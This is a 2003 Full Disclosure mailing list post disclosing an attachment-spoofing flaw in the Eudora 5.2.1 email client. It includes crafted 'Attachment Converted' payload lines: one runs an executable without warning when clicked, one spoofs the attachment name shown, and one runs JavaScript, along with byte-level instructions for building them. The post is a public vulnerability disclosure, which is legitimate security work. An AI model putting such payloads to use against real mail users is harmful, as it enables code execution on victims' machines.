Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Eudora 5.2.1 attachment spoof

From: psz () maths usyd edu au (Paul Szabo)
Date: Tue, 27 May 2003 12:27:22 +1000 (EST)
Building on my Eudora attachment spoof

  http://www.securityfocus.com/archive/1/322286

I have now found better games to play:

  From: me
  To: you
  
  Ensure victim has both attachments 'calc' and 'calc.exe' (sent in
  this, or previous, email). Then the following shows 'windows' icon
  and runs calc.exe without warning when clicked:
  Attachment Converted<CR>: attach\calc

Other mis-features I found (but I do not see how to make them into a
credible exploit):

  If we can guess the full path to the attach directory then can
  change the name shown to anything we like, but get broken icon:
  Attachment Converted<CR>: <A href=H:/windows/.eudora/attach/calc>file.txt</a>
  
  Javascript done with InternetExplorer even if we set own viewer:
  Attachment Converted<CR>: <A href=javascript:alert('hello')>hello.txt</a>

Replace the four-character <CR> marker with the single byte CR=0x0d in all
of above. Tested with Eudora 5.2.1 on Windows 2000.

Cheers,

Paul Szabo - psz () maths usyd edu au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: